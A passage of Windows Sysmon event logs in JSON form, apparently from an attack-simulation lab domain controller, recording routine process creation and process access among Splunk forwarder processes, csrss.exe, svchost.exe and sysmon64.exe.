Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:54.309","SourceProcessGUID":"{A837DB8D-0282-5F25-0000-0010B1F20500}","SourceProcessId":"3776","SourceThreadId":"3396","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3996,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:55.498\r\nProcessGuid: {A837DB8D-0283-5F25-0000-001015F50500}\r\nProcessId: 5016\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:49:55.498","ProcessGuid":"{A837DB8D-0283-5F25-0000-001015F50500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:49:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3997,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:55.497\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0283-5F25-0000-001015F50500}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:55.497","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0283-5F25-0000-001015F50500}","TargetProcessId":"5016","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3998,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:55.497\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0283-5F25-0000-001015F50500}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:55.497","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0283-5F25-0000-001015F50500}","TargetProcessId":"5016","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:49:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3999,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:55.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:55.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4000,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:55.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:55.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4001,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:55.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:55.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4002,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:55.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:55.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4003,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:55.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:55.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\